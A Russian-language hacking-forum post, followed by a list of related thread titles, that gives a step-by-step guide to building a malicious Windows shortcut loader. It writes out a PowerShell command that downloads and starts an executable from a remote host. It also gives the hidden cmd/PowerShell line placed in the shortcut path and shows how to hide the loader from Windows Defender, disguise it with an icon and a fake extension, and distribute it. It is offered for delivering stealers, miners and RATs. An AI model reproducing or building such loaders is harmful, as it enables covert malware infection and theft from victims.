Статья Интересно Как заразить компьютер с помощью обычного ярлыка.

Emilio_Gaviriya

Пользователь

Как заразить компьютер с помощью обычного ярлыка.


Всем салют, дорогие друзья! Сегодня я расскажу вам об одном интересном приеме, который, несмотря на свою простоту, используется хакерами в реальных атаках.

В этой статье вы узнаете, как хакеры собственноручно создают лоадер, который, в свою очередь, загружает их вирусы на компьютер цели.

  • Для начала напомню, что такое лоадер:

Лоадер - это небольшой файл, который в обход файрволлов загружает нужный хакеру файл (вирус - стиллер, майнер, RAT и т.д.) на машину цели и незаметно его запускает. Считается, что грузить файлы с помощью лоадера намного лучше, чем грузить файлы сразу. Так что вещь в хакерском хозяйстве незаменимая.

Как это работает?​

✅ Ну, а теперь, давайте разберемся, как это работает!
  • Первое, что понадобится - это совершенно любой бесплатный хостинг. Для примера я буду использовать 000webhost.com
1daf76_137aab75886b4c19bae5d6a95f8c3ece~mv2.png

  • Переходим на сайт -> выбираем бесплатный тариф -> проходим стандартную регистрацию:
1daf76_2414c61280a54b57ab3aa9c0c9288538~mv2.png

  • Переходим в панель управления и жмём вот так:
1daf76_0a7766c917a64ec1a7de4e747f449ba2~mv2.png

  • Создаем новый файл:
1daf76_39e047a7872347b3a51815e4f9a83acd~mv2.png

  • Выбираем наш файл и жмём Edit:
1daf76_c9d3ed0d7ce74fd4926433f8918c0e70~mv2.png

  • Вставляем в данный файл следующий текст и сохраняем:
Invoke-WebRequest ссылка_на_файл_вируса -UseBasicParsing -OutFile TEMP.exe ; Start TEMP.exe

1daf76_93eb9ba389964fac8db2d595d35b6768~mv2.png

  • Теперь нам нужно получить ссылку на наш файл. Сделать это очень просто: жмем правой кнопкой мыши по нашему файлу и выбираем View:
1daf76_99badd0ee78e4ab0ad28c7da6827486f~mv2.png

  • После этого в вашем браузере откроется новое окошко. Перейдите в него и просто скопируйте ссылку из адресной строки браузера:
1daf76_5f3165cdc564497c8fe67f44ee132dc4~mv2.png

  • Далее идем на сайт сократителя ссылок cuti.cc и вставляем в поле ссылку на .txt файл, который мы создавали выше:
1daf76_14f0ef07dd574412b6a9aee0f1af5ae0~mv2.png

  • Отлично, у нас есть сокращенная ссылка. Не теряйте ее.
  • Теперь создадим сам ярлык:
1daf76_86c7875e35a4456aa3e1b36a27749e38~mv2.png

  • В путь пишем вот это:
C:\WINDOWS\system32\cmd.exe /k powershell -W Hidden powershell -command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content

1daf76_402ce0214ea9441fa15f76e71a4a2e27~mv2.png

  • Ярлык-лоадер готов!

Несколько важных моментов​

  • Наверняка вам интересно, на кой черт используется сокращатель ссылок?
Ответ прост: прописываемый в ярлыке путь имеет ограничение на длину символов. Исходная ссылка туда не влазит.

  • Как хакеры делают так, чтобы Windows Defender не палил лоадер?
Многие используют скрипт обфускации повершелл: https://github.com/danielbohannon/Invoke-Obfuscation, с целью обфусцификации команды которая прописывается в путь. Выглядит она после этого не как выше, а вот так:

-command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content

  • Что делают хакеры, после того, как создали такой ярлык?
На файл ярлыка устанавливается иконка и нужное название файла. Так как у ярлыка не видно расширения, добавляют и его, например, дописав в конце имени файла .txt или любое другое. Если есть нужда увеличить размер файла, то можно накачивают его любым пампером. После этого файл готов к распространению.

Мануал честно спизжен с HackerPlace.
 
Похожие темы
W [ВОПРОС] Как заразить сайт имея доступ к FTP Свободное общение 3
Admin Вредоносные .REG файлы или как заразить систему имея доступ только к реестру Уязвимости и взлом 0
Admin СИ, НЛП, Впаривание малвари, как заразить вирусом Полезные статьи 0
Admin Интересно «Пароль01» и дырявый VPN. Как пустить хакеров в сеть, чтобы они сломали вообще всё (пошаговая инструкция). Новости в сети 0
Admin Статья Как "Казаки" паттерны мошенников-"Разбойников" вычисляют, вооружаясь технологиями. Анонимность и приватность 0
Admin Интересно Ваш сервер — их притон: как группа UAT-7290 сдает ваши сервера в аренду своим друзьям. Дорого. Новости в сети 0
Admin Интересно Как стать «богом» в Linux, просто правильно подгадав время. Спойлер: вам понадобится Chronomaly. Новости в сети 0
Admin Статья Как оставаться незаметным в 2025 году – простые правила оперативной безопасности для всех. Анонимность и приватность 0
Admin Статья HTTP Request Smuggling в 2025: Как обходить современные WAF Уязвимости и взлом 0
Admin Статья Криптография в малвари: Как работают вымогатели (Ransomware). Полезные статьи 0
Admin Статья Право на root. Как повышают привилегии в Linux. Уязвимости и взлом 0
Admin Статья Как простой баг повреждения памяти ядра Linux приводит к полной компрометации системы(Часть 2) Уязвимости и взлом 0
Admin Статья Как простой баг повреждения памяти ядра Linux приводит к полной компрометации системы(Часть 1) Уязвимости и взлом 0
Admin Статья Как Mozilla упустила (не)очевидную уязвимость Уязвимости и взлом 0
Admin Статья Почему ваш «Windows» прокси палится как Linux: Глубокий разбор TCP Window Size, о котором молчат. Анонимность и приватность 0
Admin Интересно Старый конь борозды не испортит. Как сертификат десятилетней давности помог хакерам проникнуть в госучреждения Азии. Новости в сети 0
Admin Статья Direct Syscalls vs EDR: Как заставить Windows выполнять ваши команды в обход хуков защитного ПО Вирусология 0
Admin Интересно Gemini лезет из каждой дыры Chrome? Вот как убить все ИИ-кнопки и вернуть нормальный браузер. Новости в сети 0
Admin Интересно «Здравствуйте, я журналист, заполните анкету». Как хакеры из КНДР «разводят» южнокорейских экспертов. Новости в сети 0
Admin Статья Гейминг как источник данных: OSINT в виртуальных мирах OSINT 0
Admin Статья Крипто-детектив: Идем по следу транзакций. Как деанонить блокчейн. OSINT 0
Admin Интересно Семь миллионов долларов за одну ночь. Рассказываем, как пострадали пользователи Trust Wallet и что делать сейчас. Новости в сети 0
Admin Интересно Казалось, что летим, а на деле — ползём. Как ИИ-помощники незаметно крадут время у профессиональных кодеров. Новости в сети 0
Admin Статья Анонимные мессенджеры: Как общаться, не оставляя следов Анонимность и приватность 0
Admin Интересно Охотник стал добычей. Как «безопасники» ловят вирусы, пытаясь скачать инструменты для их поиска. Новости в сети 0
Admin Интересно Цифровое чудо на Рождество. Как ученым удалось восстановить UNIX V4 с ленты 1970-х годов. Новости в сети 0
Admin Статья Взгляд с другой стороны: как Linux админ ловит вас Полезные статьи 0
Admin Статья Как отслеживается e-mail? OSINT 0
Support81 «Менеджер» с архивом и черным ходом через Yandex. Как группировка APT31 годами шпионила за российскими IT-компаниями Новости в сети 1
Support81 От 314 до 968 млрд рублей. Как российский рынок кибербезопасности станет монополией за 6 лет Новости в сети 0
Support81 Перевод крупной суммы по СБП на свой же счёт будет расцениваться банком как подозрительный Новости в сети 0
Support81 Перехват DNS – что это за атака и как она работает? Новости в сети 0
Support81 Суверенный Рунет. Мишустин подписал постановление о том, как им будут управлять (и от чего защищать) Новости в сети 0
Support81 $120000000 испарились за утро: как хакерам удалось обойти 10 аудитов и причем здесь ракетная программа КНДР Новости в сети 0
Support81 Одна буква — миллионные потери. Как русская «Е» обманула разработчиков и присвоила их крипту Новости в сети 0
Support81 «Ага, туннель! Придушим». Ваш VPN тоже лагает на 4G? Объясняем, как операторы видят ваш трафик (и что с этим делать) Новости в сети 0
Support81 «Магический пакет» творит чудеса: как хакеры превратили Linux-сервер в невидимку Новости в сети 0
Support81 Касперский против ChatGPT: как антивирус вычислил вредонос, написанный ИИ Новости в сети 0
Support81 Не Таиланд, а рабство в Мьянме: как туристический рай стал перевалочной базой для похитителей россиян Новости в сети 0
Support81 Оригинальный соучредитель Tesla, управлявший компанией до прихода Маска, заявил, что Cybertruck выглядит как «мусорный контейнер» Новости в сети 0
wrangler65 Как стать хакером для «самых маленьких» Ч.2 Полезные статьи 0
wrangler65 Как стать хакером для «самых маленьких» Ч.1 Полезные статьи 0
Support81 Как война в Украине стала полигоном для наркокартелей Новости в сети 0
Support81 Вайб-кодинг звучал как шутка, пока Opal от Google не начал делать сайты по вашему описанию Новости в сети 0
Support81 Серые токены, чёрные схемы: как российский бизнес уходит в крипту до принятия закона Новости в сети 1
Support81 Нажали Play — хакер уже в системе. Как работает звуковой троян Новости в сети 0
Support81 Белым по белому: как стать «гением» в науке с помощью ChatGPT Новости в сети 0
Support81 Телефон против владельца: как Android помогает хакерам воровать криптовалюту Новости в сети 0
Support81 Операторы хакерского форума BreachForums, как сообщается, арестованы во Франции Новости в сети 0
Support81 Российская ИБ стала как медицина в глубинке — врач один, а если заболеет, то все умрут Новости в сети 0

Название темы